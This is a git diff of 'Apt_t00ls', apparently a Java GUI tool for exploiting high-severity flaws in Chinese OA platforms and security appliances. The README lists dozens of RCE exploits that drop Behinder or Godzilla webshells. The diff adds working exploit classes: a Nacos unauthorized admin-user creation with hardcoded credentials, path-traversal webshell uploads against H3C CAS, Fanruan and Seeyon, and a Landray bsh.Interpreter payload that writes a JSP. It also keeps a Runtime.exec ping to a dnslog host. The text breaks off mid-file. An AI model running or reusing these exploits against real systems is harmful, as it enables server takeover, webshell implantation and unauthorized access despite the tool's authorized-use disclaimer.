Update README.md

2025-02-12 17:55:03 +08:00 · 2025-02-12 17:53:52 +08:00 · 2025-02-12 17:51:52 +08:00 · 2023-08-13 20:33:36 +08:00 · 2023-08-13 20:31:20 +08:00 · 2023-08-13 20:30:29 +08:00
23 changed files with 1011 additions and 90 deletions
--- a/.DS_Store
+++ b/.DS_Store
--- a/.gitignore
+++ b/.gitignore
@@ -1,7 +0,0 @@
-#idea
-.idea
-*.iml
-
-
-#maven编译
-target
--- a/README.md
+++ b/README.md
@@ -1,12 +1,41 @@
 # Apt_t00ls
+
 高危漏洞利用工具
+
 ---  

-## 开心指数
+## 贡献者名单

-[![Stargazers over time](https://starchart.cc/White-hua/Apt_t00ls.svg)](https://starchart.cc/White-hua/Apt_t00ls)
+<div>
+	<table frame=void>
+	<tr>
+	<td align="center">
+            <img src="https://avatars.githubusercontent.com/u/40447710"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/Geccccc"><sub>Gec</sub></a>
+        </td>
+        <td align="center">
+            <img src="./image/I0veD.jpg"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/cdxiaodong"><sub>I0veD</sub></a>
+        </td>  
+        <td align="center">
+            <img src="./image/luckyh.jpg"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/stop-bullshit"><sub>luckyh</sub></a>
+        </td>
+    </tr>
+</table>
+</div>

 ---
+
 泛微:  
 e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)  
 e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)  
@@ -15,21 +44,28 @@ e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)
 e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)  
 e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)  
 e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)  
+e-office8 fileupload-RCE (默认写入冰蝎4.0.3aes)  
 e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)  
+e-mobile_6.0 sqlli-RCE (可直接执行系统命令)  
 e-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)

 蓝凌：  
 landray_datajson-RCE (可直接执行系统命令)  
 landray_treexmlTmpl-RCE (可直接执行系统命令)  
-landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)
+landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)  
+landrayoa_fileupload_sysSearch-RCE (默认写入冰蝎4.0.3aes)

 用友:  
 yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)  
+yongyou_chajet_反序列化RCE(可直接执行系统命令)  
 yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)  
 yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)  
+yongyou_NC_jsInovke任意文件上传 (默认写入冰蝎4.0.3aes)  
 yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)  
 yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)  
-yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_GRP_AppProxy-RCE(默认写入冰蝎4.0.3aes)  
+yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)  
+yongyou_KSOA_Attachmentupload-RCE (默认写入冰蝎4.0.3aes)

 万户：  
 wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)    
@@ -42,19 +78,30 @@ wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)
 seeyonoa_main_log4j2-RCE (仅支持检测，自行开启ladp服务利用)  
 seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)  
 seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)  
-seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyonreport_svg_upload-RCE(默认写入冰蝎4.0.3aes)  
+seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)  
+seeyon_testsqli-RCE(仅检测是否存在漏洞页面)

 通达:  
 tongdaoa_getdata-RCE (直接执行系统命令)  
 tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)

+帆软：
+fanruan_save_svg-RCE (默认写入冰蝎4.0.3aes)
+
 中间件:  
 IIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)

 安全设备:  
 综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)  
+综合安防_api_file任意文件上传 (默认写入冰蝎4.0.3aes)  
+综合安防_external_report任意文件上传 (默认写入冰蝎4.0.3aes)  
 网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)  
+H3C cas_cvm_upload-RCE  (默认写入冰蝎4.0.3aes)  
+大华智慧园区任意文件上传  (默认写入冰蝎4.0.3aes)  
+深信服应用交付管理系统命令执行  
 网御星云账号密码泄露
+阿里nacos未授权任意用户添加

 使用截图：  
 ![QQ截图20221014202028](https://user-images.githubusercontent.com/100954709/195846430-84bfff61-2c7b-4027-abcc-76d5910b76e4.png)  
@@ -88,6 +135,13 @@ Tasklist敏感进程检测

 ![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)

+
+---
+
+
+## 开心指数
+
+[![Stargazers over time](https://starchart.cc/White-hua/Apt_t00ls.svg)](https://starchart.cc/White-hua/Apt_t00ls)
 ---
 ## 免责声明
 本工具仅面向合法授权的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
--- a/image/I0veD.jpg
+++ b/image/I0veD.jpg
--- a/image/luckyh.jpg
+++ b/image/luckyh.jpg
--- a/src/main/java/Main.java
+++ b/src/main/java/Main.java
@@ -1,4 +1,5 @@
 import cn.hutool.core.io.resource.ResourceUtil;
+import java.net.URL;
 import java.util.Objects;
 import javafx.application.Application;
 import javafx.fxml.FXMLLoader;
@@ -7,13 +8,14 @@ import javafx.scene.Scene;
 import javafx.stage.Stage;

 public class Main extends Application {
+    public Main() {
+    }

-    @Override
-    public void start(Stage primaryStage) throws Exception{
-        Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
+    public void start(Stage primaryStage) throws Exception {
+        Parent root = (Parent)FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
        primaryStage.setTitle("APT");
-        Scene scene = new Scene(root,1280,910);
-        scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
+        Scene scene = new Scene(root, 1280.0, 910.0);
+        scene.getStylesheets().add(((URL)Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
        primaryStage.setScene(scene);
        primaryStage.show();
    }
--- a/src/main/java/controller/AttController.java
+++ b/src/main/java/controller/AttController.java
@@ -82,7 +82,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.Jsppath);
+      run.exec(shell.open + shell.Jsppath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -93,7 +93,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.Jspxpath);
+      run.exec(shell.open + shell.Jspxpath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -104,7 +104,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.Asppath);
+      run.exec(shell.open + shell.Asppath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -115,7 +115,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.Aspxpath);
+      run.exec(shell.open + shell.Aspxpath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -126,7 +126,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.Phppath);
+      run.exec(shell.open + shell.Phppath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -137,7 +137,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.dnspath);
+      run.exec(shell.open + shell.dnspath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -148,7 +148,7 @@ public class AttController {
    Runtime run = Runtime.getRuntime();
    //path:文件路径
    try {
-      run.exec("notepad " + shell.dnscofpath);
+      run.exec(shell.open + shell.dnscofpath);
    } catch (Exception e) {
      e.printStackTrace();
    }
@@ -270,60 +270,26 @@ public class AttController {
  @FXML
  public void initialize() {

-    textArea_info.setText(
-        "------------------------------------目前EXP如下--------------------------------");
-    textArea_info.appendText(
-        "\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
-    textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
-    textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\ne-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)");
-    textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)");

    textArea_info.appendText(
-        "\n\nlandray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)");
-    textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");
-
-    textArea_info.appendText("\n\nwanhu_OfficeServer-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nwanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
-    textArea_info.appendText("\nwanhuoa_fileUploadController-RCE (默认写入冰蝎4.0.3aes)");
-
-    textArea_info.appendText("\ntongdaoa_getdata-RCE (直接执行系统命令)");
-    textArea_info.appendText("\ntongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)");
+        "\n---------------------------(禁止未授权恶意攻击)-------------------------");

    textArea_info.appendText(
-        "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
-    textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
-    textArea_info.appendText(
-        "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
-    textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nyongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)");
-
-    textArea_info.appendText("\n\nseeyonoa_main_log4j2-RCE (仅支持检测)");
-    textArea_info.appendText("\nseeyonoa_wpsAssistServlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nseeyonoa_htmlofficeservlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nseeyonoa_ajaxBypass-RCE (写入天蝎 密码sky)");
+            "\n\n 本工具仅供学习研究及合法授权下渗透测试！！！！！\n");

    textArea_info.appendText(
-        "\n\nIIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)");
-
-    textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
-    textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");
-    textArea_info.appendText("\n网御星云-上网行为管理账号密码泄露_Leadsec_ACM");
+            "\n 本工具webshell写入判断依据为md5 在修改shll内容时请勿删除md5");
+    textArea_info.appendText(
+            "\n config目录中shell开头文件均为 冰蝎4.0.3 aes生成webshell");
+    textArea_info.appendText(
+            "\n gsl.jsp为哥斯拉4.01 jsp aes 默认密码密钥 ");
+    textArea_info.appendText(
+            "\n chajet目录下为畅捷通编译好shell文件");
+    textArea_info.appendText(
+            "\n dnslog文件夹下为部分漏洞所需dnslog回显测试所用，请自行修改dnslog文件");

    textArea_info.appendText(
-        "\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");
-
-    textArea_info.appendText("\n\n---------小提醒，工具所用shell为冰蝎默认aes加密生成shell"
-        + "\n 若工具提示shell写入成功 但访问不存在或连接不上 请考虑免杀，修改shell位置在工具目录下Apt_config"
-        + "\n 工具判断shell是否写入依据md5 可自行打开查看 修改shell请保留md5 否则会影响漏洞判断");
+            "\n\n---------------------------(禁止未授权恶意攻击)-------------------------");

    //设置自动换行
    textArea_info.setWrapText(true);
@@ -361,6 +327,9 @@ public class AttController {
      case "安全设备":
        listview_kinds.setItems(Kinds_Exp.equipment());
        break;
+      case "CMS":
+        listview_kinds.setItems(Kinds_Exp.cms());
+        break;
    }
    updateListView(listview_kinds.getItems().get(0));
  }
@@ -399,18 +368,37 @@ public class AttController {
      case "通达-OA":
        choiceBox_exp.setItems(exp.tongdaoa());
        break;
+      case "帆软-OA":
+        choiceBox_exp.setItems(exp.fanruan());
+        break;
+
      case "IIS":
        choiceBox_exp.setItems(exp.iis());
        break;
+
+
+
      case "海康":
        choiceBox_exp.setItems(exp.hik());
        break;
+      case "H3C":
+        choiceBox_exp.setItems(exp.h3c());
+        break;
      case "奇安信":
        choiceBox_exp.setItems(exp.qianxin());
        break;
      case "网御星云":
        choiceBox_exp.setItems(exp.wangyu());
        break;
+
+
+
+      case "Alibaba":
+        choiceBox_exp.setItems(exp.Alibaba());
+        break;
+
+
+
      default:
        System.out.println(selectedItem);
        // 当所选项还没有exp给默认选项
--- a/src/main/java/controller/TsklistController.java
+++ b/src/main/java/controller/TsklistController.java
@@ -34,7 +34,7 @@ public class TsklistController {
        String finallist = shell.ifexe(resultlist22, exelist);
        String res;
        try {
-            res = new String(finallist.getBytes("gbk"));
+            res = new String(finallist.getBytes("utf-8"));
            textArea_res.setText(res);
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
--- a/src/main/java/exp/cms/nacos_Creatuser.java
+++ b/src/main/java/exp/cms/nacos_Creatuser.java
@@ -0,0 +1,47 @@
+package exp.cms;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class nacos_Creatuser implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞无法getshell");
+        });
+        return false;
+    }
+
+    private boolean att(String url , TextArea textArea){
+        HashMap<String,String> head = new HashMap<String,String>();
+        head.put("User-Agent","Nacos-Server");
+        String poststring = "";
+        Response post = HttpTools.post(url + "/nacos/v1/auth/users?username=nishizhu&password=zhu@123", poststring, head, "utf-8");
+
+        if(post.getCode() == 200 && post.getText().contains("create user ok")){
+            Platform.runLater(() -> {
+                textArea.appendText("\n nacos任意用户添加漏洞存在  用户添加成功，账号：nishizhu 密码：zhu@123");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n nacos任意用户添加-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+
+
+}
--- a/src/main/java/exp/equipment/Sangfor/ad_passwd.java
+++ b/src/main/java/exp/equipment/Sangfor/ad_passwd.java
@@ -0,0 +1,27 @@
+package exp.equipment.Sangfor;
+
+import cn.hutool.http.HttpRequest;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class ad_passwd implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return null;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return null;
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        Response response = HttpTools.get(url, new HashMap<String, String>(), "utf-8");
+        return false;
+    }
+}
+
--- a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
+++ b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -0,0 +1,76 @@
+package exp.equipment.h3c;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class cas_cvm_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private boolean att(String url,TextArea textArea){
+        String payload = shell.readFile(shell.Testpath);
+
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-range","bytes 0-10/20");
+        head.put("Accept-Encoding","gzip, deflate");
+        head.put("Content-type","");
+
+        Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.txt&name=222", payload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 测试文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.txt"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n cas_cvm云计算管理平台-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private boolean shell(String url,TextArea textArea){
+        String payload = shell.readFile(shell.Jsppath);
+
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-range","bytes 0-10/20");
+        head.put("Accept-Encoding","gzip, deflate");
+        head.put("Content-type","");
+
+        Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 webshell文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+
+}
--- a/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
+++ b/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
@@ -0,0 +1,77 @@
+package exp.oa.fanruan;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class fanruan_save_svg implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+            Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/nishizhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n fanruan-design_save_svg-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/nishidazhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+}
--- a/src/main/java/exp/oa/landrayoa/landray_datajson.java
+++ b/src/main/java/exp/oa/landrayoa/landray_datajson.java
@@ -1,9 +1,7 @@
 package exp.oa.landrayoa;

 import core.Exploitlnterface;
-
 import java.util.HashMap;
-
 import javafx.application.Platform;
 import javafx.scene.control.TextArea;
 import utils.HttpTools;
@@ -29,7 +27,7 @@ public class landray_datajson implements Exploitlnterface {
        shell.readFile(shell.dnspath).replace("http://", "");
        String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog + "%22)&type=1";
        Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
-        if (response.getCode() == 200 && response.getText().contains("success")) {
+        if (response.getCode() == 200 && response.getText().contains("模拟通过")) {
            Platform.runLater(() -> {
                textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
            });
--- a/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
+++ b/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
@@ -0,0 +1,75 @@
+package exp.oa.landrayoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import sun.misc.BASE64Encoder;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class landray_fileupload_sysSearch implements Exploitlnterface {
+
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url,textArea);
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+
+        String ok_result = (new BASE64Encoder()).encodeBuffer(shell.readFile(shell.Testpath).getBytes()).trim();
+        String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhu.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+        String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters=<java><void class=\"bsh.Interpreter\"><void%20method=%22eval%22><string>"+ t1 +"</string></void></void></java>";
+
+        Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/loginzhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞存在 测试文件写入成功 \n " + url + "/loginzhu.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n landrayoa_fileupload_sysSearch-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+
+        String rdf = shell.readFile(shell.Jsppath).trim();
+        String ok_result = (new BASE64Encoder()).encodeBuffer(rdf.getBytes());
+        String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhuda.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+        String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters=<java><void class=\"bsh.Interpreter\"><void%20method=%22eval%22><string>"+ t1 +"</string></void></void></java>";
+
+        Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/loginzhuda.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞存在 shell文件写入成功 \n " + url + "/loginzhuda.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n getshell失败！！！waf查杀！！！请进行免杀！！！！！");
+            });
+            return false;
+        }
+    }
+
+
+}
--- a/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
+++ b/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
@@ -0,0 +1,43 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class seeyon_testsqli implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url,textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞暂不支持getshell 请手动利用");
+        });
+        return false;
+    }
+
+    private boolean att(String url , TextArea textArea){
+        Response response = HttpTools.get(url + "/yyoa/common/js/menu/test.jsp", new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞页面存在 请自行查看是否存在注入");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n seeyon_testsqli-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+
+}
+
--- a/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
+++ b/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
@@ -0,0 +1,77 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class seeyonreport_svg_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyonreport/WebReport/nishizhu.svg.jsp");
+                });
+                return true;
+            }else {
